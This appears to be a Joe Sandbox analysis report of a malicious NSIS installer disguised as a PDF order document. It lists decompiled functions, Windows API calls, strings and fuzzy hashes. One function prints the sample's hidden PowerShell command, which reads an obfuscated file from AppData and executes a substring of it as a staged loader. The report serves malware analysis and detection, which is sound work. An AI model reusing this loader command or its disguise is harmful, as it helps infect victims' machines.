FindFirstFileA.KERNELBASE(74DF3410,007A0DB8,007A0970,00405B9D,007A0970,007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406453
FindClose.KERNEL32(00000000), ref: 0040645F

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD

Function 00403C84 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
ShowWindow.USER32(?), ref: 00403CDD
DestroyWindow.USER32 ref: 00403CF1
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0D
GetDlgItem.USER32(?,?), ref: 00403D2E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D42
IsWindowEnabled.USER32(00000000), ref: 00403D49
GetDlgItem.USER32(?,00000001), ref: 00403DF7
GetDlgItem.USER32(?,00000002), ref: 00403E01
SetClassLongA.USER32(?,000000F2,?), ref: 00403E1B
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6C
GetDlgItem.USER32(?,00000003), ref: 00403F12
ShowWindow.USER32(00000000,?), ref: 00403F33
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F45
EnableWindow.USER32(?,?), ref: 00403F60
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
EnableMenuItem.USER32(00000000), ref: 00403F7D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F95
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FA8
lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
ShowWindow.USER32(?,0000000A), ref: 00404115

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
Opcode Fuzzy Hash: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D

Function 004038E7 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000000), ref: 00403962
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410), ref: 004039D7
lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E

Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F

RegisterClassA.USER32(007A2700), ref: 00403A7B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AC8
ShowWindow.USER32(00000005,00000000), ref: 00403AFE
GetClassInfoA.USER32(00000000,RichEdit20A,007A2700), ref: 00403B2A
GetClassInfoA.USER32(00000000,RichEdit,007A2700), ref: 00403B37
RegisterClassA.USER32(007A2700), ref: 00403B40
DialogBoxParamA.USER32(?,00000000,00403C84,00000000), ref: 00403B5F

Strings

RichEd20, xrefs: 00403B04
"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 004038EB
Control Panel\Desktop\ResourceLocale, xrefs: 0040391B
C:\Users\user\AppData\Roaming\skittaget\lektier, xrefs: 00403971, 00403979, 00403A11, 00403A17, 00403A27
: Completed, xrefs: 004039A5, 004039AD, 004039BA, 00403A04, 00403A0A
RichEdit, xrefs: 00403B31
RichEdit20A, xrefs: 00403B22, 00403B28
1033, xrefs: 00403907, 0040395D
C:\Users\user\AppData\Local\Temp\, xrefs: 004038EC
.DEFAULT\Control Panel\International, xrefs: 0040394D
_Nb, xrefs: 00403A5A, 00403AC2
.exe, xrefs: 004039E4
RichEd32, xrefs: 00403B12

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-855357793
Opcode ID: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
Opcode Fuzzy Hash: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D

Function 00402EA1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,00000400), ref: 00402ECE

Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050

Strings

C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 00402EA1
C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
Error launching installer, xrefs: 00402EF1
soft, xrefs: 00402F8F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
Null, xrefs: 00402F98
Inst, xrefs: 00402F86
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2641653404
Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D

Function 00406167 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00406292
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062A5
SHGetSpecialFolderLocation.SHELL32(00405233,74DF23A0,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062E1
SHGetPathFromIDListA.SHELL32(74DF23A0,: Completed), ref: 004062EF
CoTaskMemFree.OLE32(74DF23A0), ref: 004062FB
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
lstrlenA.KERNEL32(: Completed,?,subterritories,00000000,00405233,subterritories,00000000,00000000,00799A22,74DF23A0), ref: 00406371

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406319
Clona $, xrefs: 00406349
subterritories, xrefs: 0040618C
: Completed, xrefs: 00406191, 0040625E, 0040625F, 00406260, 0040627C, 00406291, 004062A4, 004062C0, 004062EB, 0040631E, 00406324, 0040633C, 0040634F, 0040636A, 00406370, 00406378, 004063A2
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406261

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Clona $$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$subterritories
API String ID: 717251189-3719949256
Opcode ID: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
Opcode Fuzzy Hash: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E

Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",00000000,00000000,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1

Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7

Strings

Clona $, xrefs: 0040180D, 00401819, 00401831
powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
hattepuldes\Stethospasm84\, xrefs: 004017A3, 00401812, 00401830
C:\Users\Public\Pictures\shopkeeping\legio.Per, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00401786

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: Clona $$C:\Users\Public\Pictures\shopkeeping\legio.Per$C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111$hattepuldes\Stethospasm84\$powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
API String ID: 1941528284-3744323996
Opcode ID: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
Instruction ID: fd3b8c6ffda923ee712ccabd95e062e364f7e6d0f101aa5c62542bd457b9e8d3
Opcode Fuzzy Hash: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
Instruction Fuzzy Hash: F841B571900114BACF10BFB5CC45DAF36A9EF45368B20833BF522B50E2CA7C8A519B6D

Function 004030D8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031C3
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004031EC
wsprintfA.USER32 ref: 004031FC

Strings

!y, xrefs: 00403172
ay, xrefs: 00403100
!y, xrefs: 00403276
... %d%%, xrefs: 004031F6

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: !y$ !y$ ay$... %d%%
API String ID: 551687249-830929277
Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9

Function 004051FB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7

Strings

subterritories, xrefs: 0040521B, 0040522D, 00405233, 00405256, 00405262

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: subterritories
API String ID: 2531174081-2942025731
Opcode ID: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
Opcode Fuzzy Hash: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98

Function 0040646F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
wsprintfA.USER32 ref: 004064BF
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3

Strings

%s%s.dll, xrefs: 004064B9
UXTHEME, xrefs: 00406478
\, xrefs: 00406497

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
